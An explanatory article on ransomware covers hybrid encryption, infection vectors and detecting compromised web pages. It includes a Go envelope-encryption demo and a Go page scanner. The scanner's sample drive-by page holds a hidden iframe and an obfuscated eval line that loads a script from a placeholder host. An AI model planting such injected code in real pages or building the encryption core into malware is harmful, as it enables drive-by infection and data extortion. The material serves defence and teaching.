Ransomware has been getting a lot of press lately, and understandably so. In recent months there has been a wave of ransomware attacks against well-known organizations, and the threat is expected to keep wreaking havoc worldwide.
The aim of a ransomware attack is to infect a user’s system and deny them access to their most valuable assets. Typically this is done by encrypting the most important documents on the target machine, rendering them unreadable and inaccessible until a ransom is paid.
The Evolution of Ransomware
Early ransomware used symmetric encryption, with the key hard-coded in the malware or derivable from it. Reverse engineers could pull that key out of a sample and build a decryption tool for each variant, so encrypted files were usually restored within a short time. Ransomware authors quickly learned from this mistake, and most variants now use asymmetric-key cryptography: data is encrypted under a public key that ships with the malware, but decryption requires the corresponding private key, which never leaves the attacker.
More commonly, the two are combined: each file is encrypted with a fast symmetric cipher under a random key (per file or per victim), and that key is in turn encrypted, or “wrapped”, under the attacker’s public key, because encrypting bulk data directly with an asymmetric algorithm is far too slow. Either way, the victim holds nothing that can decrypt the files without the private key, so restoring them without paying for it is much harder.
This is one of the main reasons ransomware has become such a profitable business for cyber-criminals: there is no easy way for victims to get their data back, and no one-size-fits-all decryption key exists. Even where criminals still use symmetric keys and analysts manage to recover and publish one, the attacker can quickly release an updated version that uses a different key.
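The hybrid scheme described above, as an added example that is not taken from the article or from any real ransomware family: a Go program (standard library only) that encrypts a constructed sample document under a random AES-256-GCM key, wraps that key with RSA-OAEP under the attacker’s public key, and then shows that the resulting envelope opens with the attacker’s private key but not with any other. The key sizes, the Envelope layout and the sample text are assumptions for illustration; the same envelope-encryption pattern is what legitimate backup and key-management systems use.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Envelope is what remains of a file after hybrid encryption: the per-file AES key
// wrapped under the attacker's RSA public key, the GCM nonce and the ciphertext.
// Nothing in it yields plaintext without the RSA private key. (Layout is assumed.)
type Envelope struct {
	WrappedKey []byte
	Nonce      []byte
	Ciphertext []byte
}

// NewKeyPair generates the attacker-side RSA key pair. Only the public half needs
// to ship inside the malware; the private half stays with the attacker.
func NewKeyPair() (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, 2048)
}

// Seal encrypts plaintext under a fresh random AES-256-GCM key and wraps that key
// with RSA-OAEP. The symmetric key is zeroed afterwards, so the only surviving
// copy of it is the wrapped one.
func Seal(pub *rsa.PublicKey, plaintext []byte) (*Envelope, error) {
	fileKey := make([]byte, 32)
	if _, err := rand.Read(fileKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := gcm.Seal(nil, nonce, plaintext, nil)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
	if err != nil {
		return nil, err
	}
	for i := range fileKey {
		fileKey[i] = 0
	}
	return &Envelope{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ct}, nil
}

// Open recovers the plaintext. Without the matching private key the OAEP unwrap
// fails, and there is no shortcut: the AES key was never stored in the clear.
func Open(priv *rsa.PrivateKey, env *Envelope) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, env.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("cannot unwrap file key: wrong or missing private key")
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

func main() {
	attacker, err := NewKeyPair()
	if err != nil {
		panic(err)
	}
	// Constructed sample "document"; in a real attack this would be a file on disk.
	doc := []byte("Q3 forecast: revenue up 12% (constructed sample)")
	env, err := Seal(&attacker.PublicKey, doc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("ciphertext prefix: %x\n", env.Ciphertext[:16])
	// The victim holds the public key and the envelope, but not the private key.
	other, _ := NewKeyPair()
	if _, err := Open(other, env); err != nil {
		fmt.Println("victim with a different key:", err)
	}
	// The attacker, holding the private key, can decrypt on demand.
	pt, err := Open(attacker, env)
	fmt.Printf("attacker: %q err=%v\n", pt, err)
}
```

The point to take from the example is the asymmetry: everything the victim’s machine ever held (the public key, the wrapped key, the ciphertext) is useless for decryption, which is exactly why analysts can no longer extract a key from a captured sample the way they could with symmetric-only variants.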
Commonly Used Attack Vectors
Choosing the ransomware delivery mechanism is mostly a question of money. Sending spam is cheaper than developing new exploits or renting an exploit kit, but it is also less certain to succeed. Today the infection vectors most commonly used by ransomware actors are email attachments, links in emails, compromised websites and malvertising.
Email attachments and links – The attacker sends an email that tries to trick the victim into opening an attached document or clicking a link embedded in the body of the message.
Malvertising – Threat actors use web advertisements (banner ads delivered through legitimate ad networks) to spread malicious code and ransomware. Ad networks try to screen out malicious ads, but the criminals are very good at evading that screening.
Compromised websites – Cyber-criminals compromise legitimate websites and inject malicious code into them. When a user visits the compromised site, the injected code silently redirects the browser to a landing page that delivers the ransomware payload. Alternatively, criminals set up spoof websites that look nearly identical to a legitimate one and sit at a URL that is nearly indistinguishable from the original; a victim who mistakenly visits one of these is served the payload in the same way.
Mitigating ransomware attacks on compromised websites
Mitigating email-based and malvertising attacks also warrants careful attention and its own techniques, but the focus of this article is on ransomware attacks that use compromised websites.
When an attack uses a website that security products have already identified as compromised or as hosting malicious content, it can be blocked by matching the domain or IP address in the emailed link, or in the URL the user visits, against a blacklist. In practice, however, simple blacklisting suffers from the short lifespan of drive-by landing pages: by the time a domain is listed, the campaign has often moved on to a fresh one.
To cope with such short-lived content, security solutions must find the attack “on the wire”. This means the system either proactively probes the content of a website, or waits until a real user is tricked into following the link to the exploit site and inspects the attack in the live traffic.
A particularly effective detection method is to look for suspicious modifications of web page content, such as inline frames with attributes that hide them (zero width and height, or a display:none style) or heavily obfuscated JavaScript. When such an anomaly is found in a page in transit, a security product can block the user from receiving any further content from that site, which prevents the exploit-kit code from reaching and exploiting the browser. The caveat is that legitimate pages also use hidden frames, for tracking and ad measurement, so these heuristics should be combined and weighted rather than blocking on any single hit.
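One way to implement the page-content heuristics described above, as an added example rather than any product’s actual logic: a Go scanner (standard library only) that flags iframes carrying hiding attributes and scripts that decode and eval an encoded string, weights each hit, and blocks only when the combined score crosses a threshold. The rule names, weights, threshold and the three sample pages (a constructed drive-by page, a benign page and a page carrying only a tracking frame) are assumptions for illustration.

```go
package main

import (
	"fmt"
	"regexp"
)

// Finding is one heuristic hit on a page observed in transit.
type Finding struct {
	Rule     string
	Weight   int
	Evidence string
}

// Heuristics for the two modifications named in the text: iframes with attributes
// that hide them, and JavaScript that decodes and executes an encoded string.
var (
	iframeTagRe    = regexp.MustCompile(`(?is)<iframe\b[^>]*>`)
	zeroSizeRe     = regexp.MustCompile(`(?i)\b(width|height)\s*=\s*["']?0\b`)
	hiddenStyleRe  = regexp.MustCompile(`(?i)display\s*:\s*none|visibility\s*:\s*hidden`)
	scriptBodyRe   = regexp.MustCompile(`(?is)<script\b[^>]*>(.*?)</script>`)
	evalDecoderRe  = regexp.MustCompile(`\beval\s*\(\s*(unescape|atob|decodeURIComponent|String\.fromCharCode)\s*\(`)
	hexEscapeRunRe = regexp.MustCompile(`(\\x[0-9a-fA-F]{2}){8,}`)
	charCodeListRe = regexp.MustCompile(`String\.fromCharCode\s*\((\s*\d+\s*,){10,}`)
)

// BlockThreshold (assumed): a lone hidden iframe (weight 2) is not enough, because
// tracking pixels and ad measurement use them legitimately; a hidden iframe plus
// obfuscated script, or an eval of a decoded string on its own, crosses the line.
const BlockThreshold = 3

// ScanPage runs every heuristic over raw HTML and returns all hits.
func ScanPage(html string) []Finding {
	var out []Finding
	for _, tag := range iframeTagRe.FindAllString(html, -1) {
		if zeroSizeRe.MatchString(tag) || hiddenStyleRe.MatchString(tag) {
			out = append(out, Finding{"hidden-iframe", 2, truncate(tag, 80)})
		}
	}
	for _, m := range scriptBodyRe.FindAllStringSubmatch(html, -1) {
		body := m[1]
		if hit := evalDecoderRe.FindString(body); hit != "" {
			out = append(out, Finding{"eval-of-decoded-string", 3, hit})
		}
		if hit := hexEscapeRunRe.FindString(body); hit != "" {
			out = append(out, Finding{"hex-escape-run", 2, truncate(hit, 40)})
		}
		if hit := charCodeListRe.FindString(body); hit != "" {
			out = append(out, Finding{"charcode-chain", 2, truncate(hit, 40)})
		}
	}
	return out
}

// Score sums the weights so that weak signals only block in combination.
func Score(findings []Finding) int {
	total := 0
	for _, f := range findings {
		total += f.Weight
	}
	return total
}

// ShouldBlock is the decision a proxy or IDS would make for the page.
func ShouldBlock(html string) (bool, []Finding) {
	findings := ScanPage(html)
	return Score(findings) >= BlockThreshold, findings
}

func truncate(s string, n int) string {
	if len(s) > n {
		return s[:n] + "..."
	}
	return s
}

// Constructed sample pages; the hosts are placeholders, not real sites.
const MaliciousPage = `<html><body><h1>Latest news</h1>
<iframe src="https://ads.example.net/banner" width="300" height="250"></iframe>
<iframe src="http://landing.example/gate.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>
var s="\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65";
eval(unescape("%3Cscript%20src%3D%22http%3A%2F%2Flanding.example%2Fek.js%22%3E%3C%2Fscript%3E"));
</script></body></html>`

const BenignPage = `<html><body><h1>Latest news</h1>
<iframe src="https://ads.example.net/banner" width="300" height="250"></iframe>
<script>document.getElementById("menu").addEventListener("click", toggle);</script>
</body></html>`

const TrackerOnlyPage = `<html><body>
<iframe src="https://metrics.example.org/pixel" width="0" height="0"></iframe>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>`

func main() {
	for _, page := range []string{MaliciousPage, BenignPage, TrackerOnlyPage} {
		block, findings := ShouldBlock(page)
		fmt.Printf("block=%v score=%d\n", block, Score(findings))
		for _, f := range findings {
			fmt.Printf("  %-24s w=%d %s\n", f.Rule, f.Weight, f.Evidence)
		}
	}
}
```

Run against the three samples, the drive-by page scores 7 and is blocked, the benign page produces no findings, and the tracking-pixel page records a hidden-iframe finding but stays below the threshold. In a real deployment the thresholds would be tuned against traffic from the protected network, and the regular expressions would be one layer beneath proper HTML and JavaScript parsing, since attackers can split tags and strings to dodge pattern matching.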
However, not all attacks use exploit kits: often the victim is simply tricked into downloading and running the ransomware payload. Security technologies therefore need to intercept these downloads and evaluate whether the file is safe to open, typically by running it inside a sandbox and watching for behaviour such as mass file encryption. Bear in mind that samples increasingly check for sandbox or virtual-machine artefacts and stay dormant when they find them, so a clean sandbox verdict is not the final word.
Ransomware is one of the most damaging threats around today, and it is generating a healthy return for cyber-criminals across the world. It is critical that the security industry takes aggressive steps to keep pace with advances in ransomware, because only then can the threat be properly held at bay.